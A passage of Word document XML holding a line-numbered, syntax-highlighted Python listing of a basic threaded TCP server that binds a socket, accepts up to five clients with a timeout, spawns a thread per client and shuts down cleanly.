      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>buffer_size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="540" w:name="l193"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">193  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="54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lient_thread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541" w:name="l194"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">194  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="541"/>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None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="542" w:name="l195"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">195  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="542"/>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xml:space="preserve">= False  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># When the server is killed it is set to True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="543" w:name="l196"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">196  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="543"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="544" w:name="l197"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">197  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="544"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>stop_server</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45" w:name="l198"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">198  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="54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True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="546" w:name="l199"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">199  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="546"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="547" w:name="l200"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">200  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="547"/>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48" w:name="l201"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">201  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="54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49" w:name="l202"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">202  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="54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sockopt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SOL_SOCK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_REUSEADDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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550" w:name="l203"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">203  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="55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bind</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51" w:name="l204"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">204  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="551"/>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VERSION </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' : Iniciado servidor en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21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">' puerto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52" w:name="l205"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">205  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="55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53" w:name="l206"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">206  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="553"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="554" w:name="l207"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">207  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="55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timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_ACCEPT_TIMEOUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="555" w:name="l208"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">208  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="55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listen</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_MAX_CLIENTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># 5 clients are more than enough.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="556" w:name="l209"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">209  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="556"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="557" w:name="l210"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">210  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="557"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">while not </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>server_shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="558" w:name="l211"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">211  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="558"/>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59" w:name="l212"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">212  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="559"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>,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accept</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="560" w:name="l213"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">213  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="560"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="561" w:name="l214"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">214  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="561"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">pass    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Ignore timeout, next accept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="562" w:name="l215"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">215  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="56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63" w:name="l216"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">216  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="56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recibiendo datos de cliente. Excepcion {}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64" w:name="l217"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">217  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="564"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">break   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Possibly closed server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="565" w:name="l218"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">218  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="56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66" w:name="l219"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">219  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="566"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ClientThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</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01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Starts client response thread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="567" w:name="l220"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">220  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>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568" w:name="l221"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">221  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="56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lient_threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="569" w:name="l222"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">222  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="569"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="570" w:name="l223"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">223  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="570"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Make sure the server is turned off.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="571" w:name="l224"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">224  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="571"/>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72" w:name="l225"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">225  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="57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ting Down Server'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="573" w:name="l226"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">226  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="573"/>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hutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SHUT_RDWR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="574" w:name="l227"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">227  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="57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75" w:name="l228"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">228  </w:t>
      </w:r>
